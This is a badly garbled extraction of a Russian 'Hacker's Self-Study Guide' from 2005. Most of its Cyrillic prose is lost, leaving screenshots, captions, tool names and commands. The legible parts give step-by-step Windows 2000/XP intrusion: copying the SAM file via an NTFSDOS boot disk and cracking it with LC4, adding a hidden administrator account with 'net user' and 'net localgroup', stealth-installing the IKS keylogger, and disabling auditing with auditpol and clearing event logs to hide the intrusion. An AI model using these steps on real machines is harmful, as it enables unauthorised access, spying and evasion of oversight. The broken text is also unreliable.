Hacker's Self-Study Guide: A Detailed Illustrated Manual

  • 5/28/2018

    1/189

    Alex Atsctoy

    004.056.53(075.8) 32.973.20208781+32.973.2018.2781

    Alex Atsctoy.

    : . . .: [,] /Alex Atsctoy. .: , 2005. 192 .:. ISBN 5936730360.

    CIP

    ? ,

    , .

    : www.3st.ru Email: [email protected]

    ISBN 5936730360 , 2005 , 2005 , 2005

    1. 8

    2. Windows 2000/XP 25
    3. 37
    4. 57
    5. Web browsers 73
    6. 83
    7. Hacking ICQ 99
    8. Web sites 115
    9. DoS attacks 143
    Windows 2000/XP 160
    11. 176
    191

    1. 8
    9

    ? 10
    13

    16 16 17 75

    Web 19

    Web 20

    21 21 22 22 23

    23

    2. Windows 2000/XP 25
    25

    26

    27

    Windows 2000/XP 28
    SAM 29
    30

    31

    Windows 2000 33
    35

    36

    38

    NTFSDOS Pro 39
    SAM 44
    47
    ******** 50

    51 52 53

    53 56

    4. 5 7 58

    59

    63

    66

    68 69 70

    72

    5. & W e b 73 HTML 74

    Web 78

    81

    82

    6. 83 83

    85 88

    89 90 91

    96

    97

    7.ICQ 99 100 ICQ 101

    102 IP ICQ 103 ICQ 104 ICQ 106 ICQ 111

    112 113

    8. Web sites 115 Web 115 Web 116

    Web 118 1 19 120

    IIS 5 122 123 125

    Web Teleport Pro 131

    132

    136

    HTML 138

    Web 139

    142

    9.Ahl3KU" 143 DoS 144

    145

    145 8 147 Smur f . 14 8

    149

    151

    Nuke 752 Teardrop 154 Ping of Death 154

    Land 755

    155 DoS 756

    159

    10. W i n d o w s2 /. TCP/IP 160

    162 . 762

    165 765

    6

    168

    NetBus 169 173

    175

    . 176 177

    PhoneSweep 4.4 178

    PhoneSweep 4.4 179

    180

    782 185

    PhoneSweep 186

    186 190

    1 . , , , , ,

    . , , . , ( ).

    , , .. , , 2 () . .

    , :

    log:

    :

    1: 2:

    em: email

    . , ! . 13.06.1999, .. .

    !!!

    , http://www.superinternetprovider.ru

    , .

    , , , , , , , , . , , ,

    Web .

    , . , . ,

    , , ,

    ,

    .

    ,

    , .

    , , ,

    . ,

    ,

    !

    , , ,

    .

    , ,

    . ,

    80 ,

    , ,

    , ,

    .

    .

    , ,

    , , .

    ,

    , , .

    ( ), .

    (, !)

    ,

    , .

    , ,

    9

    , . , , , , , , . , ,

    , , , , .

    , . ,

    . , ,

    , , , , , .

    , , , .

    , , , , , .

    20

    . ? , , , , , , , , , (, )

    , 10

    . , , .

    , ,

    . ( ).

    , :

    (, . ).

    , , , .

    Hard DISK [ Fdisk.exe] n ( , ) .

    ! , , !

    [ 24% ] , POWER !

    IDE .

    , . , ,

    , , , , , HARD DISK , , , . , Must die, . Windows,

    , .

    , , . , Windows ? , , ? , , , , .

    11

    , ?

    21 ().:

    :

    , , , , , . , .:

    , . . , , , .

    : . . , . . , , . .

    : , .

    , ?

    , , ?

    , ?

    , .

    , , ,

    , , . . . . , , , (, ,

    ) . , :

    12

    , 16 19 .

    ( 80%)

    , nerd.

    : 1) , ; 2)

    . (, ?

    ).

    Windows Unix,

    TCP/IP

    , ,C++,Perl, Basic. ,

    .

    ,

    19 . ,

    ,

    , , .

    ,

    , , . , , , , .

    , ,

    , .

    , , , . ,

    . ,

    ,

    , .

    .

    , ,

    ,

    . ,

    .

    , , .

    , ,

    .. , .

    ,

    ,

    . , 13

    , ,

    , .

    , ,

    ,

    ,

    .

    , ,

    :

    .

    ,

    . ,

    , ,

    , ,

    ,

    [3]. , ,

    , .

    ,

    .

    " ,

    , ,

    ,

    .

    , .

    ,

    , ,

    . , , ,

    .

    14

    , ,, ,

    .

    , . ,

    , .

    , , ,

    .

    ,

    ,

    (.. ,

    ). ,

    , ,

    , , ,

    . , ,

    , , ( rootkit ). U N I X , Windows 2000 , 4,

    , , ,

    , Windows, , . .

    IP,

    .

    . , ,

    , , ,

    .

    , 4

    , ,

    .

    15

    ,

    .

    , , . ,

    DoS ,

    IDS.

    .

    ,

    .

    , ,

    , .

    ,

    ,

    .

    ,

    . ;

    , .

    ,

    , ,

    , , .

    , ,

    ,

    . , [3]

    ,

    . ,

    , [3]

    [1].

    , (

    ). ,

    16

    , , . , , , , , . , . , , ,

    . , . , ,

    , . .

    .

    Web (, RIPE NCC http://www.ripe.net). Web, Whols, , , .

    , , , Web. Yahoo (http://www.yahoo.com), Rambler (http://www.rambler.ru) . . , , , ,

    . , , , [3]. Google(http://www.google.com), . , , C:\WINNT, Wi n dows NT/2000. , .

    17

    , , Teleport Pro. , Web

    , ., , HTML Web

    , , HTTP . , , , , , ,

    , , ( 11 ). , Web , , . , .

    , , , . .

    , , , , .. , , . SAM(Security Account Manager ), . SAM , 3 , , LOphtCrack LC4 (http://www.atstake.com)., , , , Windows , MS Office . , .

    , 3 . Office Password 3.5(http://lastbit.com/download.asp) Windows , , .

    Revelation SnadBoy(http://www.snadboy.com). , 18

    ***** ,

    , Revelation .

    , , , , , , . .

    ?, , , .

    W e l o

    . , Web, , .

    , Web, Web,

    Web , . Web 5 .

    ,

    . , Web, .

    . , , 6 Death & Destruction E mail Bomber . , . , , , 6 Brutus.

    19

    , , ICQ.

    IP ICQ ( flood )ICQ , ! , 7 ICQ Flooder, I CQMu lt iV ar,

    .

    ,

    IP ICQ ICQ,

    ,

    .

    ,

    .

    W e bWeb , , ,

    DoS, .

    , IIS 5 (Internet Information Server ) Microsoft

    .

    Web

    , Web,

    HTML

    . 8

    , , CGIScan

    Brutus, IIS

    . 9 , DoS.

    Web ,

    ,

    Web. , DoS

    , , .

    Web

    , , CGI.,

    , .

    20

    TCP/IP , , , , IP,

    , . , .

    10 SuperScan, foundstone_tools(http://www.foundstone.com).

    W2R K (Windows 2000 Resource Kit Windo ws 2000), , W 2 H K (Windows2000HackerTools Windows 2000).

    ,

    , , .

    f le pe x& a m , , . , , , .

    ,

    . , , .

    . , , , , . SpyNet, .

    21

    , , VPN (Virtual PrivateNetwork ) , , . , , , ,

    , .

    , W2RK ( Windows 2000) W2HK Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP.

    , , . , NTFS Windows 2000/XP, , ,

    PGP Desktop Security.

    11~ , , .. . Web ,

    (., , http://www.securitylab.ru). 8 IIS. CGIScan

    , . ,

    22

    ,

    , II S4. Web , .

    ,

    , . .

    ,

    ; , , ( ). ,

    , ,

    , .

    ,

    .

    ,

    . 10 NetBUS,

    . , .

    ,

    , , .

    .

    , ,

    . , ,

    , , ... , , .

    , , , ,

    . ,

    ,

    ( ), ,

    ? , ,

    23

    ,

    , ?

    , ?

    , ,

    ( ),

    , , ,

    .

    , .

    . ,

    , ,

    ,

    . , , .

    ,

    ,

    ,

    , .... , ,

    Windows 2000/XP.

    24

    2 . W i n d o w s/Xf Windows 2000

    TCSEC (Trusted Computer System Evaluation

    Criteria ) . ,

    Windows 2000, ,

    .

    .

    .

    .

    .

    .

    , ,

    , ,

    , , .. ,

    .

    , ( log in ),

    ,

    . , , ,

    , .

    Windows NT/2000/XP SAM (SecurityAccount Manager ). SAM

    , ,

    . SAM

    , 3 . ,

    .

    ,

    , , .

    ,

    , ,

    . , , ,

    .., , , ,

    . , , , (, , ) ,, , .

    ,

    , , , .

    Windows NT 4 NTLM(NT LAN Manager NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager ),

    , Windows

    NTLM. Windows 2000/XP Kerberos, , ,

    .

    Windows 2000/XP,

    Windows 2000 Kerberos.

    ,

    Windows 2000/XP . , ,

    , ,

    .

    ,

    , ,

    .

    .

    Windows

    , , ,

    . ,

    , .

    , , ,

    , ,

    .

    2 6

    Windows 2000/XP , Windows NT/2000/XP .

    , . ,

    ,

    .

    , , . ,

    (Guest), , (User), .

    , , ,

    .

    , (Administrators), ,

    , ,

    ...

    u r n,

    , .

    ,

    ,

    , ..

    ,

    . , , . ,

    , ,

    , ,

    .

    Windows NT/2000/XP, , ,

    .

    , 4, ,

    , .

    ,

    , , , ,

    2 7

    , ,

    .

    ,

    11, , .

    , , [2], [6],

    ,

    Windows 2000/XP, , .

    W in d o w s 2OOO/XP Windows 2000/XP SRM

    (Security Reference Monitor ). SRM

    Windows 2000/XP, .. .

    Windows2000/XP , ,

    SRM. .

    LSA (Local Security Authority ),

    ,

    , LSA.

    , LSA

    . , LSA

    , .

    SAM (Security Account Manager

    ),

    .

    , LSA.

    AD (Active Directory ),

    AD . ,

    LSA. ,

    , :

    , ,

    Kerberos;

    , .

    , , , :

    , ,

    28

    Windows 2000/XP , /, .

    SAM AD ,

    LSA . ,

    , , ..

    , SRM., ,

    Windows 2000/XP. , . ,

    (SAM AD); ,

    . ,

    .

    SAM, , , ,

    . , ,

    , SAM AD,

    . SAM %%\5132\\5, AD %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , . ,

    , , ,

    , Windows2000/XP. SAM Windows NT 4 ,

    NTLM , ,

    ,

    LM,

    Windows. LM , SAM

    , , LOphtCrack

    (http://www.atstacke.com) , .

    LOphtCrack

    SAM,

    , , pwdump

    (http://www.atstacke.com). Windows pwdump SAM

    , LOphtCrack,

    ,

    LM .

    29

    Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , , 34, . , 1 Microsoft,

    Microsoft!

    Windows. , , .

    Windows 2000/XP , , , , , ? .

    , , Windows, SID (SecurityIDentifier), 48 , . Win

    dows2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List

    ), (Access Control Entries

    ). SID . ACL

    30

    Windows 2000/XP, , (Explorer) Windows,

    Windows2000/XP. ACL.

    Windows2000/XP (, ) LSA , SID

    8 , ., , SRM 8 ACL , , . , , . ,

    , ,

    . ,

    .

    ACL

    , Windows 2000/XP . , (

    , http://www.rootkit.com). ,

    ACL ,

    ,

    ?

    , . ,

    , Windows 2000/XP.

    Windows NT 4 , .. , Windows 2000/XP ADS

    (Active Directory Services). ADS Windows 2000,

    Windows 2000 Server.

    , ,

    .

    , , ,

    , ADS ,

    , ..

    . , , IP .

    31

    ADS ,

    , ,

    .

    OU (Organization Units), ,

    , , , , ,

    , OU. OU

    , .. OU

    , OU .

    Windows 2000/XP , .

    ,

    .

    Windows 2000 , ,

    Windows 2000 Windows NT. ,

    ,

    .

    Windows 2000/XP , . ,

    ,

    .

    , ..

    .

    ,

    . , domen. : com* .domen, comp2.domen...

    , ,

    , ,domenl, domen2,... , ,

    .

    , domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ...compN.domen2.domen1. domenl domen2, forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .

    32

    Windows 2000/XP

    , , :

    .

    (Universal group), , ,

    .

    (Global Group), , , .

    (Local group domain), , .

    ACL . . , , AD,

    , , .

    AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . ,, , Window 2000, . , , LC4

    LOpghtCrack .

    , , .

    W i n d o w s2000 Windows 2000

    , . ,

    332 5830

    , , , . , , , [7], , . , ,

    , . .

    ,

    ,

    AD. ,

    .

    ,

    .

    . ,

    . ,

    ,

    ,

    , ,

    , .

    , , ,. . , , ,

    LM,

    LM

    ( , , [3]). Microsoft NTLM ( Service

    Pack 3 Windows NT 4) NTLMv2( Service Pack 4 Windows NT 4)., , Windows 2000 Kerberos, ,

    .

    .

    , Windows 2000/XP Windows

    , LM. Windows 2000/XP Kerberos,

    NTLM LM.34

    Windows 2000/XP

    TCP 88 ,

    Kerberos, .

    LM NTLM, LOphtCrack

    .

    , ,

    . , ?

    , , ,

    .

    , ,

    . ,

    . , , , .

    ,

    .

    ,

    , Windows 2000.

    ,

    Microsoft ,

    , . W i n d o w sXP

    Windows.

    Windows 2000/XP [7], . , ,

    ,

    .

    , , Retina,

    [7].

    35

    ,

    . ,

    , , VPN (Virtual Private

    Network ). VPN ,

    . VPN ,

    .

    , , , ,

    (Bruce Schneier),

    (Applied Cryptography), .

    ,

    ,

    , .

    , ..

    .

    Windows 2000/XP , .

    SAM, LSA, SRM, ADS, LM, NTLM, Kerberos

    .

    Windows,

    .

    Windows 2000/XP, / ADS , Microsoft Press Windows 2000.

    36

    3 & Window 2000/XP, ,

    , ,

    , ? , 2,

    ,

    ,

    ,

    . . ( ,

    . .)

    ,

    . ,

    ,

    , ( ...).

    , , . ,

    , , ,

    ,

    ,

    ( ).

    ? ,

    , .

    .

    , . ,

    , .

    , .

    , ,

    ,

    Windows. , ,

    ,

    ,

    .

    , , ,

    (. 1), , . , , , .

    , , , Windows BIOS . , Windows2000/XP .

    ,

    (, ). , , MSDOS ! ,

    . , BIOS , BIOS . .

    , BIOS , NTFS, Windows2000/XP. , MSDOS , .

    , , , ( , ! , . , , ),

    Windows 2000/XP. NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MSDOS. , , Windows2000/XP

    . , . NTFSDOSProfessional .

    38

    1515fro NTFSDOS Pro .

    Windows NTFSDOS Professional

    NTFSDOS Professional Boot Disk Wizard (

    NTFSDOS Professional). ,

    NTFS. . , FORMAT/SSYSMSDOS. Windows XP Create anMSDOS startup disk ( MSDOS).

    > * NTFSDOS Professional(StartProgramsNTFSDOS Professional). (. 3.1).

    wizard will help you install Windows NT/2000/XP system files needed NTFSDOS Professional to run from a MS-DOS diskette or hard disk

    Fig. 3.1. NTFSDOS Pro > Next ().

    (. 3.2),

    , .

    > , Next (),

    .

    NTFSDOS Pro MS DOS

    ( 437).

    (. 3.3) .

    39

    NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows NT/2000/XP installation or CD-ROM to your hard disk or a pair of floppy diskettes. If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or after using this program. Use the FORMAT /S or SYS commands from a MS-DOS shell to make bootable diskettes.

    You can also make a bootable diskette on Windows XP by opening My Computer, selecting the "Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create an MS-DOS startup disk" option checked.

    < Back Next > Cancel J. .2.

    NTFSDOS Pro uses the character set for the United States version of MS-DOS (code page 437) by default. Select any additional character sets you use with DOS.
    Japan, code page 932
    Korean (Johab), code page 1361
    Korean, code page 949
    MS-DOS Canadian-French, code page 863
    MS-DOS Icelandic, code page 861
    MS-DOS Multilingual (Latin I), code page 850
    MS-DOS Nordic, code page 865
    MS-DOS Portuguese, code page 860
    MS-DOS Slavic (Latin II), code page 852

    < Back Next > Cancel

    . ..

    > Next(). NTFSDOS Pro(.3.4).

    WindowsNT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 WindowsN T/2000/XP, Service Pack. Next ().

    NTFSDOS Pro (. 3.5).

    40

    Pro uses copies of several files located in your Windows NT/2000/XP directory. Specify the name of your Windows NT/2000/XP installation directory, or a directory containing the required Windows NT/2000 system files. |c\ASFRool

    floppy labelled NTFSDOS Professional 0

    Press Next to copy files to A:\

    Next (), (. 3.7).

    Copying files to diskette...

    Cancel

    Fig. 3.7.

    (. 3.7) Next

    () . Windows XP

    NTFSPRO.EXE

    , NTFS .

    Windows NT/2000 .

    NTFSCHK.EXE,

    NTFS.

    42

    (. 3.8)

    NTFSDOS Professional.

    necessary files have been copied. You may now reboot to MS-DOS begin using NTFSDOS Professional Edition.

    . .8. NTFSDOS Pro

    > Finish (), .

    NTFSDOS Pro,

    . NTFSDOS

    Pro . ,

    , NTFSPRO.EXE,

    NTFS . ,

    , MSDOS ,

    FAT FAT32,

    NTFSDOS Pro .

    MSDOS NTFS, Windows 2000/XP . ,

    ( ), , ,

    . ,

    , , ,

    . ,

    , , .

    SAM,

    , , _/132/1'|.

    43

    5 SAM, SAM.

    NTFSDOS Pro, MSDOS SAM

    /system_root/system32/config . , , LC4 LOphtCrack (http://www.atstake.com).

    . 3.9 LC4 Import().

    Menu bar: Import, Session, Help. Import menu: Import From Local Machine; Import From Remote Registry...; Import From SAM File...; Import From Sniffer...; Import From .LC File...; Import From .LCS (LC3) File; Import From PWDUMP File...

    I File* New Session ( * ). , . 3.9.

    > Import I m p o r tFrom SAM File(* SAM). SAM.

    > SAM, 13.

    > (.3.10) SessionBegin Audit( ) .

    44

    [@stake LC4 window. Menu: File, View, Import, Session, Help. Accounts (domain ALEX3): Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX3, IWAM_ALEX3, NewUser; remaining columns: empty. Imported 7 accounts]

    Fig. 3.10. SAM , , SAM,

    . , .3.11, SAM.

    Administrator, ASPNET, Guest, HelpAssistant, IUSR_ALEX3, IWAM_ALEX3, NewUser

    . 3.11. SAM ! , 007 , , ., , 5 Pentium 2 400 .

    45

    , LC4

    .

    LC4 AuditingOptions For This Session( ), .3.12.

    Dictionary Crack: Enabled; Dictionary List. The Dictionary Crack tests for passwords that are the same as the words listed in the word file. This test is very fast and finds the weakest passwords.

    Dictionary/Brute Hybrid Crack: Enabled; Characters to prepend; 3 Characters to append; Common letter substitutions (much slower). The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in the word file. It finds passwords such as "Dana99" or "monkeys". This test is fast and finds weak passwords.

    Brute Force Crack: Enabled; Distributed; Character Set: A-Z and 0-9; Custom Character Set. The Brute Force Crack tests for passwords that are made up of the characters specified in the Character Set. It finds passwords such as "WeR3pll6s" or "vC569t12b". This test is slow and finds medium to strong passwords. Specify a character set with more characters to crack stronger passwords.

    OK | Cancel

    Fig. 3.12. , LC4 :

    Dictionary Crack ( ), DictionaryList ( ),

    . LC4 , ,

    . ,

    , , , ,

    .., .

    Dictionary/Brute Hybrid Crack(/ ), , / , , .

    Password???, .

    46

    Brute Force Crack ( ), .

    ,

    . Character Set ( ) ,

    Custom (), Custom

    Character Set (List each character) ( ( )) . Distributed () . File SaveDistributed ( ) .

    LC4

    Windows NT/2000/XP. Windows,

    Windows 95/98, Pwltool.

    '

    Windows ,

    , .

    MS Office

    (http://www.elcomsoft.com), OfficePassword 3.5. ,

    , *******

    Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows ,/,, , Window OfficePassword .

    47

    OfficePassword3.5 OfficePassword3.5 Lotus Organizer,MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicke n, MS O ffice Excel, Word, Access, Outlook, ZIP VB A, MS Office.

    OfficePassword3.5 . Word password.doc, ?

    Password: Enter password to open file \test\password.doc | OK | Cancel
    Fig. 3.13.

    Word

    , Windows, password.doc, (. 3.13).

    , OfficePassword 3.5 :

    OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).

    > Select document MS O ffice.

    OfficePassword "DEMO". Menu: File, Tools, Options, Help

    Select document

    You can also drag and drop files from Internet Explorer onto this window.

    (c) 1998-2001 Vitas Ramanchauskas, LastBit Software

    , .

    > , Select recoverymode ( ), . 3.15.

    Select recovery mode
    Document path: C:\test\password.doc (Word)
    Version: Word 8.0+
    Internal version: 133
    Word language: Russian (0419)
    Encryption type: Strong
    Text size: 537

    Preview

    Automatic: OfficePassword automatically selects most suitable recovery options. Recovery may take a lot of time (up to several months in case of a long password). About 80% of all passwords could be recovered within 48 hours. Use guaranteed recovery otherwise.

    User-defined: Adjust settings to optimize search for specific case. (This option is for advanced users only.)

    Guaranteed recovery: Success is guaranteed. Important: please read the documentation. Additional fee may apply. Click here to learn

    Cancel | Display help info | Next
    Fig. 3.15.

    > Select recovery mode ( ) :

    Automatic ( ), , Next (), , .

    Userdefined ( ), . .

    Guaranteed recovery ( ), , , , .

    >

    Next

    OfficePassword "DEMO"
    Password found: '007' (without quotes)
    The password has been copied onto the clipboard.

    Would you like to open the document now?

    Yes | No
    Fig. 3.16. !

    49

    (). , ,

    (.3.16). OfficePassword 3.5 , ,

    . , .

    ,

    ,

    .

    , , 24 28

    , . , , .

    , ,

    ,

    .

    ******, ,

    , (,

    ), ,

    ******. , ,

    , .

    , , ,

    . ,

    .

    ,

    ,

    . ,

    , N e t B u s . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus

    NetBus.

    50

    SnadBoy's Revelation

    007

    'Circled +' Cursor: Drag to reveal password | Check For Update | About | Exit

    Text of Window Under 'Circled +' Cursor (if available) | Copy to clipboard

    Status: Revelation active. Length of available text: 3

    SWORD2000

    Change Host. Host information. Destination: SWORD2000. Host name/IP: 1.001. TCP port: . User name: Administrator. Password:

    Reposition Revelation out of the way when dragging 'circled +'; Always on top; When minimized, put in System Tray; Hide 'How to' instructions

    How to
    1) Left click and drag (while holding down the left mouse button) the 'circled +'
    2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field under the cursor will be displayed in the 'Text of Window...' box.
    3) Release the left mouse button when you have revealed the text you desire.

    NOTE: If the field contains text hidden by asterisks (or some other character), the actual text will be shown. In some cases the text may actually be asterisks.
    NOTE: Not all of the fields that the cursor passes over will have text that can be revealed. Check the status light for availability of text.

    Bright green: text available (See 'length of text:' in Status area). Bright red: no text available

    Cancel

    Fig. 3.17. NetBus Sword2000 !

    Revelation . 'Circled+'Cursor ('+') SnadBoy'sRevelation ( . 3.17

    Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( ) ) ( ). .3.17, 007 NetB us Sword2000, ( ). ( NetBus) [11]. , , , , . : .

    51

    , 4. , ,

    , . , , ,

    . , backdoor , , .

    &* , , , , .

    MSDOS: NET USER < > /ADD, , NETLOCALGROUP < > < > /ADD,

    . . 3.18 .

    Command Prompt

    NewUser 00 /add
    The command completed successfully.

    C:\>net localgroup Administrators NewUser /add
    The command completed successfully.

    Fig. 3.18. NewUser

    NewUser , , .

    , , .

    52

    , .

    Windows Startup Document and Settings ( ) , . Startup, All users, .

    , , . , ( ) , . IKS (Invisible KeyLoggerStealth ), http://www.amecisco.com.

    , . , , .

    IKS http://www.amecisco.com, I n v i s i b l eKeyLogger 97 8 10 , .

    Win do ws NT/2000/XP, , , 1 'l+ir^n+l0"8"]. IKS

    W indows NT/200 0/ XP . , IK S , .

    IKS . Webiks2k20d.exe , .3.19.

    53

    DStandard Instal|pStealth Install |DUninslal|

    It'srecommendedthatyou use Standard Install if this is your first timein using IKS. Justacceptthedefaultsanddickon"InstalNow"button.OryoucandickonReadreadme M"to get familiarwith the concept of IKSfirst.During a standardinstallationa program directory will becreated; program files will beplaced in the directory. An icon to the log file viewerwillbe placed onthedesktop. NoTilerenaming (stealth features) will take place.

    InstallDirectory

    |C\ProgremFiles\iksYou need tohevaad ministratorrights on this system foritto installsuccess fully.

    rf youwanttouninstalin the future, just run thisprogram(ksinstall.exe)again,dick on the"Unmstall"tab, then "UninstallNow"to automatically uninstall the standard installation.

    Readreadme.M

    . 3.19. IKS Install Now ( ) . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.

    Settings | Help

    Filter Out Arrow Keys; Filter Out Ctrl and Alt Keys; Filter Out F1 to F12 Keys; Filter Out All Other Function Keys

    Use Notepad; Translate to Text Only

    Clear Log: Clear Binary Log Upon Exit; Clear Text Log Upon Exit

    Import Binary Log From:

    Save Text Log To: C:\DOCUME~1\ADMINI~1.000\LOCALS | Browse

    Fig. 3.20.

    54

    Go! () , . . 3.20 , , .

    , IKS

    , . iks.sys system_root/system32/drivers , (

    Regedt32 .3.21).R e g i s t r y E d i t o r [HKEY LOCAL MACHINE on Lo c nl M nchi

    Registry Edit Tree View Security Opt i o ns Window HelpSGemuwaSGpc&I37DRIVERCEJIASICQ GroupwareCOIISADMINIPMkslCDILDAPQIMAP4D32GDIMonitor inetaccsCllnetln(o

    Inport

    Start:REG_DWORD:0x3Type: REG_DWORD:0 x1

    Fig. 3.21. Windows (,

    The Clean er, ). IKS, Stealth Install( ) (.3.19)

    , calc.sys, (, ).

    IKS

    . 007 StealthMonitor, Web,

    , , . Win dows , , , notepad.exe.

    55

    , BIOS, .

    , . , , . ,

    , , , , ( ), , , .

    , , .

    Windows 2000/XP . Win do ws 9 x / M e , , PGPDesktop Security, . Windows 9x/Me ,

    .

    , , , , ? . .

    56

    4.

    , ,

    ,

    . , , , ,

    , , , ,

    . , , , , ,

    .

    ,

    . 1 ,

    50%

    ,

    , , .

    , , ,

    . ,

    ,

    , ,

    .

    ,

    ( ).

    ,

    ( ).

    , . , , , , . .

    , , ,

    . , ,

    ,

    . ,

    privacy .

    ,

    , , , ,

    , ,

    .

    , [10],

    (, )

    , ,

    privacy. ,

    , , ,

    , , , . .

    , , ,

    ,

    ,

    . ,

    .

    .

    , . ,

    , .

    , , , ,

    .

    , .

    . ,

    Web

    , Web

    ,

    .

    ,

    , ,

    58

    (,

    ).

    ,, , ,

    . ,

    ? , ,

    . :

    , . , Web.

    , .

    ,

    .

    Windows,

    (Explorer) , .

    ,

    Win do ws .

    ,

    MS Office.

    , , ,

    .

    ?

    , .

    . ,

    ,

    (Explorer) ,

    . , (Delete) Windows , , .

    W i n d o w s, , , , , MS Office.

    , ,

    (Show hidden files and folders)

    59

    (Folder Options) Windows. * (Tools * Folder Options) (. 4.1).

    )0 j | |j I

    ( .| | |

    : " " ;D 0 0 ()Q

    Q ,/ "

    < 1 |

    OK I 1I. 4.1.

    Word (Delete) Windows , . . 4.2, , Word, , , .

    ^3 IQPGP

    g SecurityI ; DatabaseLSJ I

    rf 3.5 (:)& (:)(D:)

    : 10 (50 ||

    3PGPI]Security5| 5 0 ~ $ . d o c

    |~WRL0002.tmp_ ~ W R U > 0 0 4 . t m p|~WRL1120.tmp~WRL19B2.tmp|~WRL3531.tmp

    Fig. 4.2. ,

    , . , .WB K, 60

    , ~$. , , , Windows, , , Win do ws . , , , . ?

    , MS Office, , , , Norton Utilities. Cleaner Disk Security (http://www.theabsolute.net/sware/index.html#Clndisk). , , , . , . ,

    , . , , . ( 100%) .

    . 4.3 Clean Disk Security 5.01 (http://www.theabsolute.net/sware/index.html#Clndisk),

    ,

    ( ).

    Clean Disk Security 5.01

    Erasefully ( ).

    , , (

    . 4.3. Clean Disk Security 5.01

    61

    FAT NTFS). ,

    , .

    Windows, Windows,

    Temp ( , ,

    )

    . ,

    , , (cookie).

    ,

    (. 4.3).

    . 4.3, :

    Simple () 6 ,

    .

    ; 1 .

    NIS 7

    (.. ) .

    Gutmann 35 (.. ).

    (Peter Gutmann)

    . .

    ,

    ( ).

    Test mode ( ) #10

    ASCII.

    . , Clean Disk Security 5.01

    , ,

    .

    , [10]. , :

    (UPS);

    . , , .

    ,

    .


    , , .

    , ,

    . ,

    ,

    , .

    ,

    . ,

    , , Norton Utilities,

    , / , .

    , ,

    [10]. ( )

    , ,

    regedt32.

    . ,

    ,

    NTFS.

    , ,

    ,

    . ,

    Web

    .

    , , . .

    , ,

    .

    & , ,

    .

    . ,

    .


    , . (). , ,

    , .

    ( Web, , , ), , , , . , , .

    (., [5],[10], , , ). , ,

    . , , , . , .

    , , . .

    , . , , ,

    . ,

    , , , , . , , Web ,


    . HTML Web. Web , , Web, .

    ,

    , Web http://www.privacy.net/analyze, , Web . . 4.4, , Web, .

    3lAnalyze YourInternetPrivacy Microsoft Internet Explorer^^ ^ ~ BBSBBBgg ** ^

    Your Browser Type and Operating System:

    Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)

    All Information sent by your web browser when requesting this web page:

    Accept: */*
    Accept-Language: ru
    Connection: keep-alive
    Host: www.privacy.net
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
    Cookie: Date=1/30/2002; Privacy.net=Privacy+Analysis
    Via: 1.1 cea15. 1.1proxy.iptelecom.net.ua:3128(Squid/2.4.STABLE3)
    X-Forwarded-For: 212.9.232.151, 212.9.224.89
    Cache-Control: max-age=259200

    a _ . 4.4. W eb

    , ( )

    Whols, 1, .

    , , IP . Web Web , IP

    ...


    , , Web, ( a n o n ym i z e r ). , Web, ,

    . , , http://www.anonymizer.com.(. 4.5).

    Anonymiz er.com Onlinu Privacy Sorvic4 1 | U [ ifer

    hup.//ww wanonymteBf.coin.Anonymizer.com(|AboutPrivacy

    FINDITSTO spyCap ' :. 4.5. Web

    Go.

    , FTP, , , . , , ,

    Web, , . ( ), .

    Web , (Proxy server)

    (. 4.6).


    ' " . ,

    D

    Q

    0 : |www.anonymize| ; J8080 [...D

    :::

    111

    |

    . 4.6.

    , , ,.. Web , .

    .

    HTTP, FTP, Web, FTP.

    , .

    .

    . , , , Web, ,Yahoo. proxy+server+configuration+Explorer, Web, , . , , .


    , , , , , , , . , , ,

    3 IKS. , , NetBus (http://www.netBus.org). , , , , , .

    :

    , ( ).

    IP , , .

    , , . , Back Orifice 2000 31337 , , 31336, , , .

    ,

    Windows NT/2000/XP. , auditpol W2RK, , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm). (Event Viewer) Windows 2000/XP.

    , , (Hidden). Windows , .

    , .

    , 68


    , , explorer.exe, Windows

    Windows.

    , EliteWrap,

    [11].

    ( Rootkit ).

    ,

    ,

    .

    .

    Tripwire (http://www.tripwiresecurity.com), , Cisco

    Systems (http://www.cisco.com)

    . Windows 2000/XP , ,

    , [7].

    , ,

    ,

    , .

    ,

    / . Windows NT/2000/XP, , auditpol.exe

    W2RK. ( )

    , .

    :

    C:\Auditpol>auditpol \\ComputerName /disable
    Running...
    Audit information changed successfully on \\ComputerName ...
    New audit policy on \\ComputerName ...
    (0) Audit Disabled
    System                    = No
    Logon                     = No
    Object Access             = No
    Privilege Use             = No
    Process Tracking          = Success and Failure
    Policy Change             = No
    Account Management        = No
    Directory Service Access  = No
    Account Logon             = No

    //ComputerName , /disable . auditpol.exe , , , , ( auditpol /?

    ).

    Windows2000/XP :> (Start)

    (Settings Control Panel).File Action View Help

    Eve nt Viewer[Local]I T y p eIDescription ISire

    Application ErrorR e c o r d 512...

    Delete all recordsnthe log

    Puc. 4 .7 . Windows


    (Control Panel) (Administrative Tools).

